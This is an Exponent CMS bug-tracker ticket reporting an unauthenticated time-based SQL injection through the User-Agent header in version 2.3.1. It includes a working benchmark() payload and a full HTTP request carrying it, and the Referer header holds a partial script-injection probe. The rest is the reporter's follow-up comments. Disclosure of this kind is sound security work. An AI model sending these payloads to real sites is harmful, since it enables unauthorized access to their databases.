Type	To find
responsible:me	tickets assigned to you
tagged:"@high"	tickets tagged @high
milestone:next	tickets in the upcoming milestone
state:invalid	tickets with the state invalid
created:"last week"	tickets created last week
sort:number, importance, updated	tickets sorted by #, importance or updated
Combine keywords for powerful searching.
Use advanced searching »

#1238 ✓resolved

Time Based SQL Injection " User Agent"

Reported by Narendra Bhati | November 16th, 2014 @ 11:53 AM | in User issues

Exponent CMS 2.3.1 - Time Based SQL Injection

Exploitation - Remotely ( Non Authenticated User Can Exploit It )

Vulnerable Parameter - User Agent Header

Payload - ' and benchmark(20000000,sha1(1))--

Here is http request which is taking 2 seconds to response compare then original response

GET /exponent/users/edituser/id/1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0'%20and%20benchmark(20000000%2csha1(1))--%20
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/exponent/index.php?src=%22%3E%3Cscript%3Ealert(1)%...
Cookie: pun_cookie_b03d0f=1%7C5c85108006f3ca4b272432a5be442deb43756d9c%7C1447517668%7C75fabcf00a72c6c06c40ec432c44c158a90fe85b; xoadmstyle=orange; PHPSESSID=1snnfufn6jlq63rbf1l7q9ps76; xoops_user54677c84=0
Connection: keep-alive

Comments and changes to this ticket

You flagged this item as spam.
Narendra Bhati November 16th, 2014 @ 12:01 PM
- Tag set to “security”
You flagged this item as spam.
Narendra Bhati November 16th, 2014 @ 01:39 PM
POC Video - http://youtu.be/CE-c_SC0vWQ
You flagged this item as spam.
Narendra Bhati November 17th, 2014 @ 06:09 AM
Any Update ?
You flagged this item as spam.
Narendra Bhati December 4th, 2014 @ 07:36 PM
Any update regarding this issue ?
You flagged this item as spam.
Narendra Bhati December 20th, 2014 @ 02:03 PM
- Assigned user set to “expNinja”
So what your are going to do next ? about this issue !
You flagged this item as spam.
Narendra Bhati December 27th, 2014 @ 05:30 PM
- Assigned user set to “expNinja”
Is there any public acknowledgement will be annouce for reporting these issue ?
You flagged this item as spam.
Narendra Bhati December 27th, 2014 @ 06:18 PM
- Assigned user set to “expNinja”
Thats look fine ! but sorry to say , where is my name for reporting issue ? isn`t is look strange !
You flagged this item as spam.
Narendra Bhati December 27th, 2014 @ 06:34 PM
- Assigned user set to “expNinja”
ok thanks

Please Sign in or create a free account to add a new ticket.

With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.

Create new ticket

Create your profile

Help contribute to this project by taking a few moments to create your personal profile. Create your profile »

Bug Tracker for Exponent CMS

Shared Ticket Bins (Sort)

↓↑ drag 337 Open tickets
↓↑ drag 775 Resolved tickets
↓↑ drag 0 This week's tickets

Exponentcms Exponent CMS → User issues

Time Based SQL Injection " User Agent"